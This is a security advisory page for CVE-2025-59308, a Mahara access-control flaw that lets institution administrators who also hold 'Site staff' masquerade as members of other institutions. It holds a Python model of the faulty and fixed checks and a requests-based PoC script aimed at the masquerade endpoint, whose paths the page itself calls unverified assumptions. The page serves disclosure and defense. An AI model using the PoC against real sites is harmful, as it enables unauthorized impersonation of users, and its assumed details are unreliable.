Security Vulnerability Report
CVE-2025-59308 (CVSS 4.7, MEDIUM)

Published: 2026-04-24 16:16:24
Last Modified: 2026-04-24 17:54:36

Description

In Mahara before 24.04.10 and 25 before 25.04.1, an institution administrator or institution support administrator on a multi-tenanted site can masquerade as an institution member in an institution for which they are not an administrator, if they also have the 'Site staff' role.
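The advisory describes an authorization bug, not a missing authentication step: the masquerade decision accepts the 'Site staff' role as a substitute for actually administering the target user's institution. The following is an added illustration of that decision, reconstructed from the advisory text only; it is not Mahara's code, and the names Account, can_masquerade_vulnerable and can_masquerade_fixed, along with the institution labels, are assumptions chosen for the example. The vulnerable variant is shown beside the hardened one so the cross-institution case can be checked directly.

```python
from dataclasses import dataclass, field

# Simplified model of the masquerade authorization decision described in the
# advisory. Added example, not Mahara's code: Account and both check functions
# are assumptions, and the pre-fix logic is reconstructed from the text alone.


@dataclass
class Account:
    username: str
    institution: str                 # institution the account belongs to
    site_admin: bool = False
    site_staff: bool = False
    # Institutions this account administers, as institution administrator or
    # institution support administrator.
    admin_of: set = field(default_factory=set)


def can_masquerade_vulnerable(actor: Account, target: Account) -> bool:
    """Pre-fix logic as the advisory describes it: an institution admin who
    also holds 'Site staff' reaches members of every institution, because the
    staff flag short-circuits the check on the target's institution."""
    if actor.site_admin:
        return True
    if not actor.admin_of:
        return False  # 'Site staff' alone is not enough; no admin role held
    # Bug: site staff is accepted in place of administering target.institution.
    return actor.site_staff or target.institution in actor.admin_of


def can_masquerade_fixed(actor: Account, target: Account) -> bool:
    """Hardened logic: only a site admin, or an administrator of the target's
    own institution, may masquerade. 'Site staff' grants nothing here."""
    if actor.site_admin:
        return True
    return target.institution in actor.admin_of


def run_scenarios() -> dict:
    """Evaluate the cross-institution case from the advisory plus two controls
    (a plain institution admin without 'Site staff', and a same-institution
    target that must still be allowed after the fix)."""
    attacker = Account("attacker_admin", "inst_a", site_staff=True, admin_of={"inst_a"})
    plain_admin = Account("plain_admin", "inst_a", admin_of={"inst_a"})
    victim_other = Account("victim", "inst_b")     # member of another institution
    member_own = Account("member", "inst_a")       # member of the attacker's own
    return {
        "vuln_cross_inst": can_masquerade_vulnerable(attacker, victim_other),
        "fixed_cross_inst": can_masquerade_fixed(attacker, victim_other),
        "vuln_no_staff_cross_inst": can_masquerade_vulnerable(plain_admin, victim_other),
        "fixed_own_inst": can_masquerade_fixed(attacker, member_own),
    }


if __name__ == "__main__":
    for name, allowed in run_scenarios().items():
        print(f"{name}: {'ALLOWED' if allowed else 'denied'}")
```

The point to carry into a review of any multi-tenant masquerade or impersonation feature: the check must be anchored on the target's tenant, not on any role the actor holds globally, unless that global role is explicitly meant to span tenants.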

CVSS Details

CVSS Score: 4.7
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L (PR:H: the attacker must already hold a high-privilege account)
Weakness: CWE-284 (Improper Access Control)

Configurations (Affected Products)

No CPE configuration data is present in the NVD record; the affected ranges below are taken from the description.

Mahara < 24.04.10 (fixed in 24.04.10)
Mahara 25.x < 25.04.1 (fixed in 25.04.1)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC concept: demonstrate the masquerade privilege escalation.
# Attacker prerequisite: an account holding BOTH the 'Site staff' role and an
# institution administrator (or institution support administrator) role in
# some institution, on a multi-tenanted Mahara site.
#
# The login form fields and the masquerade endpoint used below are this PoC's
# own assumptions and were not verified against Mahara's source; Mahara's
# forms also carry a session key (sesskey) that a real request must include.
import requests

# Target configuration
base_url = "https://target-mahara-site.com"
login_url = f"{base_url}/login.php"                        # assumed path
masquerade_url = f"{base_url}/admin/users/masquerade.php"  # assumed path

# Attacker credentials (account with Site staff + institution admin roles)
session = requests.Session()
payload = {
    'username': 'attacker_admin',
    'password': 'password',
}
session.post(login_url, data=payload, timeout=10)

# Attempt to masquerade as a user in a DIFFERENT institution, one where the
# attacker does NOT hold an institution administrator role.
poc_data = {
    'userid': 'victim_user_id_in_other_institution',
    'usertype': 'user',
}
response = session.post(masquerade_url, data=poc_data, timeout=10)

# Weak success heuristic: a 200 alone proves nothing (requests follows
# redirects), so also look for the victim's identifier in the returned page.
if response.status_code == 200 and "victim_user_id_in_other_institution" in response.text:
    print("[+] Vulnerability exploited: masquerading as a user in another institution.")
else:
    print("[-] Exploit failed or patch applied.")

References

https://mahara.org
https://mahara.org/interaction/forum/topic.php?id=9851
Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-59308", "sourceIdentifier": "[email protected]", "published": "2026-04-24T16:16:23.610", "lastModified": "2026-04-24T17:54:36.243", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "In Mahara before 24.04.10 and 25 before 25.04.1, an institution administrator or institution support administrator on a multi-tenanted site can masquerade as an institution member in an institution for which they are not an administrator, if they also have the 'Site staff' role."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.2, "impactScore": 3.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "references": [{"url": "https://mahara.org", "source": "[email protected]"}, {"url": "https://mahara.org/interaction/forum/topic.php?id=9851", "source": "[email protected]"}]}}